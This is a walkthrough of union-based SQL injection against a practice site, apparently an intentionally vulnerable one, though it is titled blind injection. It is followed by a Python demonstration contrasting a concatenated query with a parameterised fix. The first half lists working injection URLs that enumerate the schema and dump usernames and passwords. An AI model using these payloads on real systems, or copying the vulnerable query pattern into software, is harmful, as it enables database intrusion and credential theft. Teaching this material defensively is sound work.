Blind SQL Injection
Check error: http://testphp.vulnweb.com/artists.php?artist=1'
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /hj/var/www/artists.php on line 62
—
1. Select Table Name and Column Name
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 1,2,concat(table_name,' | ',column_name) FROM information_schema.columns where table_schema !='mysql ' and table_schema !='information_schema' --
Result: artists | artist_id
2. Select other Table (Skipping Artists table)
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 2,3, concat(table_name,' | ',column_name) FROM information_schema.columns where table_schema !='mysql ' and table_schema !='information_schema' and table_name not in ('artists') --
Result: carts | cart_id
Skipping tables 'artists', 'carts', 'categ', 'featured', 'guestbook', 'pictures', 'products':
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 1,2,concat(table_name,' | ',column_name) FROM information_schema.columns where table_schema !='mysql ' and table_schema !='information_schema' and table_name not in ('artists','carts', 'categ', 'featured', 'guestbook', 'pictures', 'products') --
Result: users | uname
3. Display other column in table “users”
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 1,2,concat(table_name,' | ',column_name) FROM information_schema.columns where table_schema !='mysql ' and table_schema !='information_schema' and table_name not in ('artists','carts', 'categ', 'featured', 'guestbook', 'pictures', 'products') and column_name not in('uname') --
Result: users | pass
There are 2 columns in the table “users” as below:
“users | uname”
“users | pass”
4. Show uname & pass value from table “users”
http://testphp.vulnweb.com/artists.php?artist=-1 union all SELECT 1,2,concat(uname,' | ',pass) FROM users --
Final result: test | test
User: test | Password: test
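Why the steps above succeed, and how the query should be written instead, shown as an added example that is not code from the original page or from the test site. It assumes an in-memory SQLite database as a stand-in for the site's MySQL backend; the schema, the sample rows and the function names artist_vulnerable and artist_hardened are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's database (schema and rows are assumptions).
    db = sqlite3.connect(":memory:")
    # Older SQLite has no concat(); register one so the page's step 4 value runs unchanged.
    db.create_function("concat", -1, lambda *parts: "".join(str(p) for p in parts))
    db.executescript("""
        CREATE TABLE artists (artist_id INTEGER PRIMARY KEY, aname TEXT, adesc TEXT);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO artists VALUES (1, 'sample artist', 'sample description');
        INSERT INTO users VALUES ('test', 'test');
    """)
    return db

def artist_vulnerable(db, artist):
    # The request parameter is pasted into the SQL text, so it can add its own clauses.
    # A stray quote breaks the statement, which is what the PHP warning above reveals.
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id=" + artist
    return db.execute(sql).fetchall()

def artist_hardened(db, artist):
    # 1) Accept only a plain integer id; anything else is rejected before reaching SQL.
    try:
        artist_id = int(artist)
    except ValueError:
        return []
    # 2) Bind the value as data; the database never parses it as SQL.
    sql = "SELECT artist_id, aname, adesc FROM artists WHERE artist_id = ?"
    return db.execute(sql, (artist_id,)).fetchall()

# Parameter value from step 4 of the page.
STEP4 = "-1 union all SELECT 1,2,concat(uname,' | ',pass) FROM users -- "

if __name__ == "__main__":
    db = make_db()
    print("vulnerable, normal id :", artist_vulnerable(db, "1"))
    print("vulnerable, step 4    :", artist_vulnerable(db, STEP4))
    print("hardened, normal id   :", artist_hardened(db, "1"))
    print("hardened, step 4      :", artist_hardened(db, STEP4))
    print("hardened, quote probe :", artist_hardened(db, "1'"))
```

In the PHP application the equivalent change is a prepared statement with a bound integer parameter, and a database account for the web application that cannot read tables it does not need.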